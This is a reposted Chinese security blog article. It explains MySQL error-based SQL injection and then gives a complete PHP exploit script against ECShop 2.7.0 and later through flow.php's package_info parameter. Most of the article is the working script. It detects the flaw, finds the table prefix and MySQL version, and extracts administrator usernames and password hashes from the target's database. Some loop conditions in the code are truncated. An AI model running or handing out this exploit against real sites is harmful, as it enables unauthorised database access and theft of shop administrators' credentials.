【转载】Ecshop lib_common.php注入

admin
admin
admin
102075
文章
87
评论
2021年4月3日19:10:35评论36 views字数 717阅读2分23秒阅读模式

昨天无意间读到:
    http://www.packetstormsecurity.org/papers/database/PT-devteev-FAST-blind-SQL-Injection.txt

发现原来可以这样注入
    MySQL >= 5.0:

        执行:
            select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;

        或:
            select 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

        会报错:
            Duplicate entry '5.1.30-community1' for key 'group_key'

    MySQL

        执行:
            select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);

    数次后会报错:

        Duplicate entry '4.1.22-community-nt:1' for key 1

正好解决了ecshop最新的漏洞,无礼包限制。

影响版本:
    ecshop >= 2.7.0

package.php:

/*
 * P.O.C. by xsser - http://www.wooyun.org/bug.php?action=view&id=248
 */
error_reporting(E_ALL  & ~E_WARNING);
ini_set('display_errors', '1');
@set_time_limit(0);

hr();
banner();
if (count($argv)
{
 usage();
 exit;
}
hr();

$host = $argv[1];
$path = $argv[2];

$username = array();
$password = array();

exploit($host, $path);
print "Getting database prefix ...n";
$pre = prefix($host, $path);
define('PRE',$pre);
print "Verifying MySQL Version...n";
$version = version($host, $path); 
print "Counting admin user ...n";
$ucount = ucount($host, $path,$version);
print "Admin Users : $ucountn";
for ($i=1;$i
{
 print "Injecting username and password for admin $i ...n";
 Inject($host, $path,$i,$username[$i],$password[$i],$version);
 print "n";
}
 hr();
 print "*n";
 print "* [+] Target Host   : $host$pathn";
 print "* [+] Admin Founded : $ucountn";
 print "*n";
for ($i=1;$i
{
 print "* [+] Username : " . $username[$i] . "n";
 print "*     Passowrd : " . $password[$i] . "n";
 print "*n";
}
 hr();

function hr()
{
 print "****************************************************************************n";
}

function banner()
{
 print "* [+] Exploit      : ECShop >= 2.7.0 (lib_common.php) Remote SQL Injection *n";
    print "* [+] Date         : 22-08-2010                                            *n";
    print "* [+] Author       : alibaba                                               *n";
 print "* [+] QQ           : 1499281192                                            *n";
}

function usage($argv0)
{
 hr();
 print "* [+] Usage   : php package.php                               *n";
 print "* [+] Example : php package.php www.ecshop.com /                           *n";
 print "* [+] Example : php package.php www.ecshop.com /shop/                      *n";
 hr();
}

function exploit($host, $path)
{
 $url = $path . 'flow.php?step=add_package_to_cart';
 $data = 'package_info={"package_id":"1'","number":"1"}';
 $buffer = POST($host,80,$url,$data,30);
 if (!strrpos($buffer,"MySQL server error report"))
  die("No Vulnerability");
 else
  print "Vulnerability Founded!n";
}

function prefix($host, $path)
{
 $url = $path . "flow.php?step=add_package_to_cart";
 $data = 'package_info={"package_id":"1 and 1=2 union all select 1,2,1,4,5,6,1,8,9,0 from ecs_admin_user--","number":"1"}';
 $buffer = POST($host,80,$url,$data,30);
 if (!strrpos($buffer,"MySQL server error report"))
  $pre = 'ecs_';
 else
 {
  preg_match("/FROM `(.+)`.`(.+)package_goods`/i",$buffer,$m);
  $pre = isset($m[2])? $m[2] : '';
 }
 return $pre;
}

function version($host, $path)
{
 $url = $path . "flow.php?step=add_package_to_cart";
 $data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,count(user_name),0x5d) FROM ' . PRE . 'admin_user LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
 $buffer = POST($host,80,$url,$data,30);
 if (preg_match("/'information_schema.tables' doesn't exist/i",$buffer))
 {
  print "MySQL Version
  return false;
 }
 else
 {
  print "MySQL Version >= 5.0n";
  return true;
 }
}

function ucount($host, $path, $version)
{
 $url = $path . "flow.php?step=add_package_to_cart";
 if ($version)
 {
  $data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,count(user_name),0x5d) FROM ' . PRE . 'admin_user LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
  $buffer = POST($host,80,$url,$data,30);
  preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer,$m);
 }
 else
 {
  $found = false;
  $i=0;
  while($found==false && $i
  {
   $data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,9,10 and row(1,1)>(select count(*),concat((Select concat(0x5b,count(user_name),0x5d) from ' . PRE . 'admin_user),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)","number":"1"}';
   $buffer = POST($host,80,$url,$data,30);
   if (preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer))
   {
    preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer,$m);
    $found = true;
   }
   $i++;
  }
 }
 return $m[1];
}

function Inject($host, $path, $number, &$username, &$password, $version)
{
 $number--;
 $username = '';
 $url = $path . "flow.php?step=add_package_to_cart";
 if ($version)
 {
  $data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) FROM ' . PRE . 'admin_user LIMIT ' . $number . ',1),floor(rand(0)*2))x from information_schema.tables group by x","number":"1"}';
  $buffer = POST($host,80,$url,$data,30);
  preg_match("/Duplicate entry '[(.+):(.+)]1' for key/i",$buffer,$m);
 }
 else
 {
  $found = false;
  $i=0;
  while($found==false && $i
  {
   $data = 'package_info={"package_id":"-1 union all select 1,2,3,4,5,6,7,8,9,10 and row(1,1)>(select count(*),concat((Select concat(0x5b,user_name,0x3a,password,0x5d) from ' . PRE . 'admin_user LIMIT ' . $number . ',1),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)","number":"1"}';
   $buffer = POST($host,80,$url,$data,30);
   if (preg_match("/Duplicate entry '[(.+)]1' for key/i",$buffer))
   {
    preg_match("/Duplicate entry '[(.+):(.+)]1' for key/i",$buffer,$m);
    $found = true;
   }
   $i++;
  }
 }
 $username = $m[1];
 $password = $m[2];
}

function POST($host,$port,$path,$data,$timeout, $cookie='') {
 $buffer='';

    $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
    if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
 else {
        fputs($fp, "POST $path HTTP/1.0rn");
        fputs($fp, "Host: $hostrn");
        fputs($fp, "Content-type: application/x-www-form-urlencodedrn");
        fputs($fp, "Content-length: ".strlen($data)."rn");
        fputs($fp, "Connection: closernrn");
        fputs($fp, $data."rnrn");
      
  while(!feof($fp))
  {
   $buffer .= fgets($fp,4096);
  }
  
  fclose($fp);
    }
 return $buffer;
}
?>

文章来源于lcx.cc:【转载】Ecshop lib_common.php注入

相关推荐: 【文章】8.5 使用密钥 - 控制密钥使用 存贮区

8.5 使用密钥     软件加密是可怕的。一台微机在一种程序控制下的时代已过去了,现在有Macintosh系统7、Windows NT和UNIX,谁也说不准什么时候操作系统将会中止加密的运行,将一些东西写在磁盘上,和处理另外一些急需的工作。当操作系统最后回头…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:10:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【转载】Ecshop lib_common.php注入http://cn-sec.com/archives/320085.html

发表评论

匿名网友 填写信息